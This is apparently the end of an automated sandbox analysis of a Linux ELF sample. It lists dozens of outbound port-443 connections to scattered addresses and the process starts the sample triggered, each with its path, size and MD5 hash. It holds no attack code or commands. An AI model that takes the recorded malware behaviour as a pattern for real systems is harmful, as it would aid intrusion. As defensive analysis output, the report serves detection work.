                                          28615192.168.2.234052474.55.47.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28616192.168.2.234554848.74.20.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28617192.168.2.2348744198.86.225.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28618192.168.2.233453073.54.27.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28619192.168.2.235946693.137.235.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28620192.168.2.2349214157.208.255.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28621192.168.2.2359366190.215.108.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28622192.168.2.2356374131.239.72.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28623192.168.2.2338270111.66.192.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28624192.168.2.23491702.83.168.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28625192.168.2.234730298.225.194.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28626192.168.2.2349234115.32.51.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28627192.168.2.2335134180.80.49.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28628192.168.2.236039017.180.115.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28629192.168.2.2334246118.11.85.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28630192.168.2.2336046154.57.210.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28631192.168.2.2346070216.158.247.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28632192.168.2.2348154175.41.255.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28633192.168.2.2360148198.255.179.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28634192.168.2.2359242141.235.155.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28635192.168.2.234866489.88.209.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28636192.168.2.235594449.192.168.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28637192.168.2.235929834.172.97.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28638192.168.2.234281420.8.97.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28639192.168.2.2335500105.241.85.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28640192.168.2.233677283.156.230.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28641192.168.2.2337654143.64.182.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28642192.168.2.2344370159.15.211.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28643192.168.2.233660857.125.168.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28644192.168.2.2360212192.103.197.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28645192.168.2.235632299.54.144.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28646192.168.2.234208288.92.18.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28647192.168.2.2358382109.52.255.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28648192.168.2.2352350154.102.145.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28649192.168.2.2357688128.36.105.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28650192.168.2.234486251.163.125.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28651192.168.2.2351466205.181.188.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28652192.168.2.2341818186.252.96.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28653192.168.2.2348910126.51.99.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28654192.168.2.233517065.198.21.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28655192.168.2.234013643.97.25.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28656192.168.2.2360558210.250.182.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28657192.168.2.2355792216.5.106.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28658192.168.2.2338354175.159.231.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28659192.168.2.2334438155.118.186.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28660192.168.2.2348170194.111.112.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28661192.168.2.2334286174.40.26.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28662192.168.2.235543235.146.209.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28663192.168.2.2358250213.47.248.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28664192.168.2.2355118152.101.90.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28665192.168.2.233593096.220.168.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28666192.168.2.2340990108.12.110.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28667192.168.2.233556276.165.249.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28668192.168.2.2345948130.138.29.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28669192.168.2.2355402169.14.112.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28670192.168.2.2358092179.205.217.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28671192.168.2.235942274.161.113.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28672192.168.2.2359896178.95.200.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28673192.168.2.234851635.51.208.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28674192.168.2.2335138144.170.61.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28675192.168.2.2348008111.239.117.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28676192.168.2.234877441.224.242.157443
                                          TimestampBytes transferredDirectionData


                                          System Behavior

                                          Start time (UTC):14:45:49
                                          Start date (UTC):14/01/2024
                                          Path:/tmp/skyljne.x86_64.elf
                                          Arguments:/tmp/skyljne.x86_64.elf
                                          File size:155960 bytes
                                          MD5 hash:059c0115b367791e046b05ee0249d52c

                                          Start time (UTC):14:45:49
                                          Start date (UTC):14/01/2024
                                          Path:/tmp/skyljne.x86_64.elf
                                          Arguments:-
                                          File size:155960 bytes
                                          MD5 hash:059c0115b367791e046b05ee0249d52c

                                          Start time (UTC):14:45:49
                                          Start date (UTC):14/01/2024
                                          Path:/tmp/skyljne.x86_64.elf
                                          Arguments:-
                                          File size:155960 bytes
                                          MD5 hash:059c0115b367791e046b05ee0249d52c

                                          Start time (UTC):14:45:49
                                          Start date (UTC):14/01/2024
                                          Path:/tmp/skyljne.x86_64.elf
                                          Arguments:-
                                          File size:155960 bytes
                                          MD5 hash:059c0115b367791e046b05ee0249d52c
                                          Start time (UTC):14:45:49
                                          Start date (UTC):14/01/2024
                                          Path:/tmp/skyljne.x86_64.elf
                                          Arguments:-
                                          File size:155960 bytes
                                          MD5 hash:059c0115b367791e046b05ee0249d52c
                                          Start time (UTC):14:45:49
                                          Start date (UTC):14/01/2024
                                          Path:/tmp/skyljne.x86_64.elf
                                          Arguments:-
                                          File size:155960 bytes
                                          MD5 hash:059c0115b367791e046b05ee0249d52c
                                          Start time (UTC):14:45:50
                                          Start date (UTC):14/01/2024
                                          Path:/usr/libexec/gnome-session-binary
                                          Arguments:-
                                          File size:334664 bytes
                                          MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                          Start time (UTC):14:45:50
                                          Start date (UTC):14/01/2024
                                          Path:/bin/sh
                                          Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
                                          File size:129816 bytes
                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                          Start time (UTC):14:45:50
                                          Start date (UTC):14/01/2024
                                          Path:/usr/libexec/gsd-print-notifications
                                          Arguments:/usr/libexec/gsd-print-notifications
                                          File size:51840 bytes
                                          MD5 hash:71539698aa691718cee775d6b9450ae2

                                          Start time (UTC):14:45:50
                                          Start date (UTC):14/01/2024
                                          Path:/usr/sbin/gdm3
                                          Arguments:-
                                          File size:453296 bytes
                                          MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                          Start time (UTC):14:45:50
                                          Start date (UTC):14/01/2024
                                          Path:/etc/gdm3/PrimeOff/Default
                                          Arguments:/etc/gdm3/PrimeOff/Default
                                          File size:129816 bytes
                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                          Start time (UTC):14:45:50
                                          Start date (UTC):14/01/2024
                                          Path:/usr/sbin/gdm3
                                          Arguments:-
                                          File size:453296 bytes
                                          MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                          Start time (UTC):14:45:50
                                          Start date (UTC):14/01/2024
                                          Path:/etc/gdm3/PrimeOff/Default
                                          Arguments:/etc/gdm3/PrimeOff/Default
                                          File size:129816 bytes
                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c